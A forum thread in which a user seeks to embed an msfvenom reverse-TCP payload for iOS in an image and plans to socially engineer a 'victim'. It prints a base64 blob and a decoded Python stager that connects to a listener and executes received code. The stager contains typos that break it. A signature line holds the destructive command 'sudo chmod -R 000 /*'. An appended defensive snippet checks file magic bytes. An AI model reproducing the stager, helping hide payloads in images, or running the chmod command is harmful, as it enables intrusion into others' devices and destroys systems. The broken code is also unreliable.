
Apple iOS file types...

Hey Guys!

 

So I wanted to embed a payload into an image using fakeimageexploiter. Now, the payload would be a machos file for iOS (created using msfvenom) but fakeimageexploiter only supports 'ps1, exe, bat, txt' payloads that are not readable by iOS (I think). And so I want to know if there's a way to embed machos payload for iOS into jpg/jpeg/png or another image type to bind a reverse tcp shell.

 

(and ofc im doing this for pen testing i mean just to clarify cz then the mods gonna take action and stuff)


Thanks in advance


I'm pretty sure you can read a .txt file in iOS but I would imagine the payload would be platform dependent... just because you can technically read it on iOS doesn't mean it will actually do anything.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*


5 hours ago, Sauron said:

I'm pretty sure you can read a .txt file in iOS but I would imagine the payload would be platform dependent... just because you can technically read it on iOS doesn't mean it will actually do anything.

that makes sense but the question's still there, how do i embed a machos file that was created using this payload: "osx/armle/shell_reverse_tcp" into an image file. And ur right its platform dependent which is why there's a ton of payloads u can choose between i mean there's one for windows (windows/meterpreter/reverse_tcp) and for android (android/meterpreter/reverse_tcp) so yea its platform dependent which is why i cannot use any supported file extensions in iOS. Btw i am not an iOS user...


1 minute ago, mbasil22 said:

that makes sense but the question's still there, how do i embed a machos file that was created using this payload: "osx/armle/shell_reverse_tcp" into an image file. And ur right its platform dependent which is why there's a ton of payloads u can choose between i mean there's one for windows (windows/meterpreter/reverse_tcp) and for android (android/meterpreter/reverse_tcp) so yea its platform dependent which is why i cannot use any supported file extensions in iOS. Btw i am not an iOS user...

It's not about the extension here, it's about the content. If iOS isn't explicitly supported by the tool then there's probably no way to attack it using that tool. Unless you're willing and able to write your own payload that is.


5 hours ago, Sauron said:

It's not about the extension here, it's about the content. If iOS isn't explicitly supported by the tool then there's probably no way to attack it using that tool. Unless you're willing and able to write your own payload that is.

hmm, well the content is python i mean if u open the file u will get this:

 

 

aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQpzLmNvbm5lY3QoKCcxOTIuMTY4LjEuMicsNDQzKSkKaT1zdHJ1Y3QudW5wYWNsKCc+aScscy5yZWN2KDQpKVswXQpkPXMucmVjdihpKQp3aGlsZSBsZW4oZCk8aToKCWQrPXMucmVjdihpLWxlbihkKSkKZXhlYyhkLHtzJzpzfSk=

 

 

and then if u decrypt the above base64 code u get this:

 


import socket,struct
s=socket.socket(2,socket.SOCK_STREAM)
s.connect(('192.168.1.2',443))
i=struct.unpacl('>i',s.recv(4))[0]
d=s.recv(i)
while len(d)<i:
    d+=s.recv(i-len(d))
exec(d,{s':s})

 

and this code is python and idk if python runs on iOS... like if ur talking content then that's that

 

 

Now, bcz this is


 

10 hours ago, mbasil22 said:

and this code is python and idk if python runs on iOS... like if ur talking content then that's that

 

 

Now, bcz this is

No interpreter for iOS. Get Android, install termux emulator and then apt install python3 if you want to run python code on a phone.

 


Sudo make me a sandwich 


4 hours ago, wasab said:

 

No interpreter for iOS. Get Android, install termux emulator and then apt install python3 if you want to run python code on a phone.

 


 

12 hours ago, Sauron said:

It doesn't.

Which means there is no possible way to create an undetectable payload for iOS and social engineering is the only way to go i mean ill have to make the victim install some kind of interpreter too (only IF there's one at that time or else even social engineering would fail i guess) after which he/she will be able to execute the python code. Why does fakeimageexploiter not support machos or ipa file types tho... i mean what's wrong with machos/ipa?


1 hour ago, mbasil22 said:

Which means there is no possible way to create an undetectable payload for iOS and social engineering is the only way to go i mean ill have to make the victim install some kind of interpreter too (only IF there's one at that time or else even social engineering would fail i guess) after which he/she will be able to execute the python code.

Python isn't the only way you can attack a system... it's just the only way that tool supports. And even if you got the victim to install an interpreter that doesn't mean your python code would do anything at all - smartphone applications are sandboxed, the chances of you being able to do anything malicious through python are slim at best. And either way the code would have to be specifically adapted.

1 hour ago, mbasil22 said:

Why does fakeimageexploiter not support machos or ipa file types tho... i mean what's wrong with machos/ipa?

The file extension doesn't matter, what matters is how the system will read it.


On 12/1/2019 at 7:01 PM, Sauron said:

Python isn't the only way you can attack a system... it's just the only way that tool supports. And even if you got the victim to install an interpreter that doesn't mean your python code would do anything at all - smartphone applications are sandboxed, the chances of you being able to do anything malicious through python are slim at best. And either way the code would have to be specifically adapted.

The file extension doesn't matter, what matters is how the system will read it.

got it :) thnx
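
Added example, not part of the original thread: the point made above that the file extension doesn't matter, only how the system reads the content, seen from the defender's side. This Python sketch (function names and sample bytes are constructed here) compares an image extension with the file's magic bytes and flags data appended after a PNG's IEND chunk.

```python
import os
import struct
import zlib

# Magic bytes decide how a parser or loader treats a file; the name does not.
MAGICS = [
    (b"\xff\xd8\xff", "jpeg"), (b"\x89PNG\r\n\x1a\n", "png"),
    (b"MZ", "pe"),
    (b"PK\x03\x04", "zip"),                       # an .ipa is a zip archive
    (b"\xfe\xed\xfa\xce", "macho"), (b"\xce\xfa\xed\xfe", "macho"),
    (b"\xfe\xed\xfa\xcf", "macho"), (b"\xcf\xfa\xed\xfe", "macho"),
    (b"\xca\xfe\xba\xbe", "macho-fat"),           # value shared with Java .class
]
EXT_TYPES = {".jpg": "jpeg", ".jpeg": "jpeg", ".png": "png"}

def sniff(data):                                  # type implied by leading bytes
    for magic, kind in MAGICS:
        if data.startswith(magic):
            return kind
    return "unknown"

def png_end(data):                                # offset just past IEND, or None
    pos = 8                                       # skip the 8-byte PNG signature
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 12 + length                        # length + type + body + CRC
        if ctype == b"IEND":
            return pos if pos <= len(data) else None
    return None

def check_image(name, data):
    """List reasons a file named like an image should not be trusted as one."""
    findings = []
    claimed = EXT_TYPES.get(os.path.splitext(name)[1].lower())
    actual = sniff(data)
    if claimed and actual != claimed:
        findings.append(f"extension says {claimed}, content is {actual}")
    if actual == "png":
        end = png_end(data)
        if end is None:
            findings.append("png chunk list is truncated or malformed")
        elif end < len(data):
            extra = data[end:]
            findings.append(f"{len(extra)} trailing bytes after IEND ({sniff(extra)})")
    return findings

def _chunk(ctype, body):                          # builds the constructed sample
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))

# Constructed samples: a PNG skeleton (IHDR + IEND only) and a bare Mach-O magic.
PNG = b"\x89PNG\r\n\x1a\n" + _chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)) + _chunk(b"IEND", b"")
MACHO_STUB = b"\xcf\xfa\xed\xfe" + b"\x00" * 28
```

The trailing-data check covers PNG only; JPEG needs a segment-aware parser to locate the real end-of-image marker.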
